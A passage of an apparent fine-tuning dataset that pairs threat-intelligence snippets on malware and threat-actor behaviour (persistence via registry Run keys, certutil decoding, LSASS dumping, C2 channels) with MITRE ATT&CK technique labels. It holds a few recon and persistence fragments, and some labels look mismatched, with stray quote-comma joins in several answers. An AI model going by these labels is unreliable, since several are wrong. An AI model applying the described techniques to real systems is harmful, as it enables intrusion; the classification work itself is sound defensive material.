- "content": "Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use of custom routines to decrypt strings (Deobfuscate/Decode Files or Information [T1140]) - Ability to self-delete once installed (Indicator Removal on Host: File Deletion [T1070.004]) - Masquerade as GrowlHelper (Masquerading: Masquerade Task or Service [T1036.004]) - And as Software Update Check (Masquerading: Masquerade Task or Service [T1036.004]) - Decrypt strings in-memory, per CIA guidelines (Obfuscated Files or Information [T1027"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses rundll32 to call an exported function."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can obtain information about process integrity levels."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec can add or remove applications or ports on the Windows firewall or disable it entirely."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke downloaded a file \"libprocesshider\", which could hide files on the target system."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has used \"dir\" to search for \"programfiles\" and \"appdata\"."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates gathers Kubernetes service account tokens using a variety of techniques."
- },
- {
- "role": "assistant",
- "content": "T1528 - Steal Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications"
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has conducted C2 over HTTP and HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA lists the system’s processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used \"sc query\" on a victim to gather information about services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While investigating these files, we observed what we believe was active development on these .cmd files that helps illuminate the Gamaredon group’s processes"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors spawned shells on remote systems on a victim network to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can use a variety of API calls to execute shellcode."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network’s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router"
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can send \"consent phishing\" emails containing malicious links designed to steal users’ access tokens."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ABK has the ability to inject shellcode into svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pandora can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first plist, ~/Library/LaunchAgents/com.safarii.extension.plist, does not use a StartInterval value like the Chrome variant, but instead uses RunAtLoad. The RunAtLoad parameter is executed when the user logs into their computer. Note that the plist file does not use the correct spelling of Safari. "
- },
- {
- "role": "assistant",
- "content": "T1647 - Plist File Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used WinRM via PowerShell to execute command and payloads on remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1021.006 - Remote Services: Windows Remote Management"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 has used Meterpreter to enumerate users on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has communicated with C2 through files uploaded to and downloaded from DropBox."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been known to remove indicators of compromise from tools."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes."
- },
- {
- "role": "assistant",
- "content": "T1497.002 - User Activity Based Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has obtained tools such as PuTTY for use in their operations."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has downloaded additional files and programs from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors copied files to company web servers and subsequently downloaded them."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads encoded payloads and decodes them on the victim."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can encrypt strings at compile time."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can use WinSock API for communication including \"WSASend\" and \"WSARecv\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLACKCOFFEE has the capability to enumerate files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound malware has used VBS scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather a process list from the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat's loader has been packed with the compressed ShimRat core DLL and the legitimate DLL for it to hijack."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has created the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell\" and sets the value to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence by creating a shortcut in the Windows startup folder to run a script each time the user logs in."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spora ransomware, which began circulating in January of this year, is a ransomware noted for its sophistication, including top-notch customer support to victims, and was likely created by professional malicious actors."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. According to Group-IB researchers, APT41 usually parks their domains for some time at 127.0.0.1 after their campaigns are over. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry. The contents of the file \"install.bat\" from APT41's This is Not a Test campaign"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Now the virtual environment is prepared, the install.bat command goes through a list of process names and terminates these processes so any files they have open are unlocked and become accessible for encryption. This list of 50 entries consists of mainly line-of-business applications, database, remote management and backup applications and is stored in a text file. Another text file contains services names. These are tailored to the victim organization’s network environment, including process and service names belonging to endpoint protection software"
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has connected outbound over TCP port 443 with a FakeTLS method."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit. Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>: [command]<>[parameters for command in hexadecimal format] The available commands are"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can brute force passwords for a specified user on a single target system or across an entire network."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT has added persistence via the Registry key \"HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\\" and dropped a shortcut in \"%STARTUP%\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027.008 - Stripped Payloads"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "But Ryuk isn’t new to us… we’ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)—especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including “WIZARD SPIDER,” “UNC1878,” and “Team9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SharpStage can use WMI for execution."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used WMI for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SYNful Knock is malware that is inserted into a network device by patching the operating system image."
- },
- {
- "role": "assistant",
- "content": "T1601.001 - Patch System Image"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PsExec can leverage Windows services to escalate privileges from administrator to SYSTEM with the \"-s\" argument."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload sends system information about the infected computer to the C&C server and downloads additional tools."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has abused the \"KernelCallbackTable\" to hijack process control flow and execute shellcode."
- },
- {
- "role": "assistant",
- "content": "T1574.013 - KernelCallbackTable"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT28 macro uses the command \"certutil -decode\" to decode contents of a .txt file storing the base64 encoded payload."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has hashed a string containing system information prior to exfiltration via POST requests."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Forfiles can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has conducted internal spearphishing within the victim's environment for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1534 - Internal Spearphishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gather all network configuration information and record to a file on disk in a folder created by the implant using the command: cmd.exe /c ipconfig/all >>\"%s\" & arp -a >>\"%s\" where %s = <file_path"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Torisma can send victim data to an actor-controlled C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can install itself as a cron job."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type network traffic can communicate over a raw socket."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fifteen minutes after domain enumeration, we observed successful lateral movement to two endpoints on the network. Ten minutes after lateral movement, a PowerShell Cobalt Strike loader executed as a service on a server. Even though the execution was not successful, the threat actors kept trying, a total of eight times, until it finally worked. Windows Defender real-time monitoring was then disabled, the LSASS.exe process was dumped using SysInternals ProcDump, and privilege was escalated to “SYSTEM” using named pipe impersonation. "
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution', 'T1068 - Exploitation for Privilege Escalation', 'T1546.013 - Event Triggered Execution: PowerShell Profile"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used Windows Scheduled Tasks to establish persistence on local and remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses ipconfig /all and route PRINT to identify network adapter and interface information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
